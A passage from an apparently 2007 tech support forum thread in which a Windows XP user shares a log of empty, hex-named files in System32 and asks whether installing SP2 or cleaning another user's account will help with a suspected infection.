*** (empty)
****************************************
C:\WINDOWS\System32\9ACA5390

*** (empty)
****************************************
C:\WINDOWS\System32\DF21552E

*** (empty)

****************************************
End of file posts

They were all empty except the first one, which had a bunch of spaces. They are all type "File" and the last date modified was January 2007.
Old 03-23-2007, 07:19 PM #80
cul8rman (Registered User)
Join Date: Aug 2006
Location: Arizona
Posts: 134
OS: XP


Re: MS Windows XP will not load when connected to internet

Will updating to SP2 help, or do I need to wait until this is resolved? I think the infection may have entered through another user on this, should I be working on that person's area or does the software look at the whole drive?

Thanks - BTW, system is running alright so far.
Copyright 2001 - 2009, Tech Support Forum